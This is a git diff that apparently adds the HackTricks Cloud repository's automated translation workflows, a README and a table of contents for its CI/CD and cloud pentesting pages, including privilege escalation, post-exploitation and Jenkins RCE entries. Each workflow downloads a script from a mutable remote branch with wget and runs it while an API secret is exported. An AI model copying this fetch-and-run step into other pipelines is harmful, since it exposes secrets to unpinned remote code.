+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
\ No newline at end of file
diff --git a/.github/workflows/translate_pt.yml b/.github/workflows/translate_pt.yml
new file mode 100644
index 0000000000..831cf311a2
--- /dev/null
+++ b/.github/workflows/translate_pt.yml
@@ -0,0 +1,81 @@
+name: Translator to PT (Portuguese)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: pt
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Portuguese
+      BRANCH: pt
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+    
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
diff --git a/.github/workflows/translate_rs.yml b/.github/workflows/translate_rs.yml
new file mode 100644
index 0000000000..067b5d47fa
--- /dev/null
+++ b/.github/workflows/translate_rs.yml
@@ -0,0 +1,81 @@
+name: Translator to RS (Serbian)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: rs
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Serbian
+      BRANCH: rs
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
\ No newline at end of file
diff --git a/.github/workflows/translate_sw.yml b/.github/workflows/translate_sw.yml
new file mode 100644
index 0000000000..b3deb4c286
--- /dev/null
+++ b/.github/workflows/translate_sw.yml
@@ -0,0 +1,81 @@
+name: Translator to SW (Swahili)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: sw
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Swahili
+      BRANCH: sw
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
\ No newline at end of file
diff --git a/.github/workflows/translate_tr.yml b/.github/workflows/translate_tr.yml
new file mode 100644
index 0000000000..0097cd1c3b
--- /dev/null
+++ b/.github/workflows/translate_tr.yml
@@ -0,0 +1,81 @@
+name: Translator to TR (Turkish)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: tr
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Turkish
+      BRANCH: tr
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
\ No newline at end of file
diff --git a/.github/workflows/translate_ua.yml b/.github/workflows/translate_ua.yml
new file mode 100644
index 0000000000..3e154f45f8
--- /dev/null
+++ b/.github/workflows/translate_ua.yml
@@ -0,0 +1,81 @@
+name: Translator to UA (Ukranian)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: ua
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Ukranian
+      BRANCH: ua
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000000..6826262d3c
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,33 @@
+.vscode
+.vscode/*
+
+
+
+
+
+# General
+.DS_Store
+.AppleDouble
+.LSOverride
+
+# Icon must end with two \r
+Icon
+
+# Thumbnails
+._*
+
+# Files that might appear in the root of a volume
+.DocumentRevisions-V100
+.fseventsd
+.Spotlight-V100
+.TemporaryItems
+.Trashes
+.VolumeIcon.icns
+.com.apple.timemachine.donotpresent
+
+# Directories potentially created on remote AFP share
+.AppleDB
+.AppleDesktop
+Network Trash Folder
+Temporary Items
+.apdisk
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000000..17db20c7d4
--- /dev/null
+++ b/README.md
@@ -0,0 +1,67 @@
+# HackTricks Cloud
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src=".gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src=".gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src=".gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src=".gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+<figure><img src=".gitbook/assets/cloud.gif" alt=""><figcaption></figcaption></figure>
+
+_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
+
+{% hint style="success" %}
+Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news.
+{% endhint %}
+
+### **Pentesting CI/CD Methodology**
+
+**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
+
+{% content-ref url="pentesting-ci-cd/pentesting-ci-cd-methodology.md" %}
+[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
+{% endcontent-ref %}
+
+### Pentesting Cloud Methodology
+
+**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
+
+{% content-ref url="pentesting-cloud/pentesting-cloud-methodology.md" %}
+[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
+{% endcontent-ref %}
+
+### License & Disclaimer
+
+**Check them in:**
+
+{% content-ref url="https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq" %}
+[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
+{% endcontent-ref %}
+
+### Github Stats
+
+![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src=".gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src=".gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src=".gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src=".gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/SUMMARY.md b/SUMMARY.md
new file mode 100644
index 0000000000..008efc3d05
--- /dev/null
+++ b/SUMMARY.md
@@ -0,0 +1,495 @@
+# Table of contents
+
+## 👽 Welcome!
+
+* [HackTricks Cloud](README.md)
+* [About the Author](https://book.hacktricks.xyz/welcome/about-the-author)
+* [HackTricks Values & faq](https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq)
+
+## 🏭 Pentesting CI/CD
+
+* [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
+* [Github Security](pentesting-ci-cd/github-security/README.md)
+  * [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md)
+    * [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md)
+    * [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md)
+    * [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md)
+  * [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md)
+  * [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md)
+* [Gitea Security](pentesting-ci-cd/gitea-security/README.md)
+  * [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md)
+* [Concourse Security](pentesting-ci-cd/concourse-security/README.md)
+  * [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md)
+  * [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md)
+  * [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md)
+* [CircleCI Security](pentesting-ci-cd/circleci-security.md)
+* [TravisCI Security](pentesting-ci-cd/travisci-security/README.md)
+  * [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md)
+* [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md)
+  * [Basic Jenkins Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md)
+  * [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md)
+  * [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md)
+  * [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md)
+  * [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md)
+  * [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md)
+* [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md)
+  * [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md)
+  * [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md)
+* [Terraform Security](pentesting-ci-cd/terraform-security.md)
+* [Atlantis Security](pentesting-ci-cd/atlantis-security.md)
+* [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md)
+  * [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md)
+  * [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md)
+* [Okta Security](pentesting-ci-cd/okta-security/README.md)
+  * [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md)
+* [Supabase Security](pentesting-ci-cd/supabase-security.md)
+* [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md)
+* [TODO](pentesting-ci-cd/todo.md)
+
+## ⛈️ Pentesting Cloud
+
+* [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md)
+* [Kubernetes Pentesting](pentesting-cloud/kubernetes-security/README.md)
+  * [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md)
+  * [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md)
+    * [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md)
+  * [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md)
+  * [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md)
+  * [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md)
+  * [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md)
+  * [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md)
+    * [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md)
+    * [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md)
+  * [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md)
+  * [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md)
+  * [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md)
+  * [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md)
+  * [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md)
+    * [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md)
+  * [Kubernetes OPA Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md)
+    * [Kubernetes OPA Gatekeeper bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md)
+  * [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md)
+    * [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md)
+  * [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md)
+* [GCP Pentesting](pentesting-cloud/gcp-security/README.md)
+  * [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md)
+    * [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md)
+  * [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md)
+  * [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md)
+    * [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md)
+    * [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md)
+    * [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md)
+    * [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md)
+    * [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md)
+    * [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
+    * [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
+    * [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
+    * [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md)
+    * [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md)
+    * [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md)
+    * [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md)
+    * [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md)
+    * [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
+    * [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
+    * [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md)
+    * [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md)
+    * [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md)
+  * [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md)
+    * [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md)
+    * [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md)
+    * [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md)
+    * [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md)
+    * [GCP - BigQuery Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md)
+    * [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
+    * [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md)
+    * [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md)
+    * [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md)
+    * [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
+    * [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md)
+      * [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md)
+    * [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
+    * [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
+    * [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md)
+    * [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md)
+    * [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md)
+    * [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md)
+    * [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md)
+    * [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md)
+    * [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md)
+    * [GCP - Secretmanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md)
+    * [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md)
+    * [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md)
+    * [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md)
+    * [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md)
+    * [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md)
